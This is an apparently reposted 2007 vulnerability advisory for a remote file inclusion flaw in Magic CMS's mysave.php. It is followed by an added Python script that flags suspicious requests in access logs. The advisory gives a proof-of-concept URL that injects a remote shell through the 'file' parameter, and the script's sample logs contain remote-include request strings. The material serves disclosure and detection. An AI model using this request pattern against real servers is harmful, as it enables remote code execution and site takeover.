2007-03-08 Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability
Rated as: Moderate Risk

                            \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.
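
With no vendor fix available, access logs are the practical place to check for use of the PoC request shape shown above. The following is an added example, not part of the original advisory: it scans access-log lines for requests that set `file` on mysave.php. The log lines are constructed samples; the common-log layout and the choice to flag every `file` parameter for review are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line as it appears in a common/combined access-log entry (assumed layout)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any "scheme://" prefix: include() would fetch the target instead of a local path
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)

# Constructed sample input (documentation addresses and host names)
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Mar/2007:10:00:01 +0000] "GET /cms/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Mar/2007:10:02:13 +0000] "GET /cms/mysave.php?file=http://host.example/x HTTP/1.1" 200 312',
    '192.0.2.44 - - [08/Mar/2007:10:02:20 +0000] "GET /cms/mysave.php?file=http%253A%252F%252Fhost.example%252Fx HTTP/1.1" 200 312',
    '192.0.2.51 - - [08/Mar/2007:10:05:40 +0000] "GET /cms/mysave.php?file=config HTTP/1.1" 200 88',
    '192.0.2.10 - - [08/Mar/2007:10:06:02 +0000] "POST /cms/mysave.php HTTP/1.1" 200 90',
]

def classify(log_line):
    """Return (verdict, value) for a request that sets file= on mysave.php, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/mysave.php"):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("file")
    if values is None:
        return None  # note: POST bodies and cookies are not visible in access logs
    for v in values:
        # parse_qs decoded once; decode again to catch double-encoded values
        for cand in (v, unquote(v)):
            if SCHEME_RE.match(cand):
                return ("remote-include", cand)
    # With register_globals = on, any request-supplied file= overwrites $file
    return ("file-param-set", values[0])

def scan(lines):
    """Return [(line_number, verdict, value)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n,) + verdict)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
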

securitydot.net - 2007-03-08
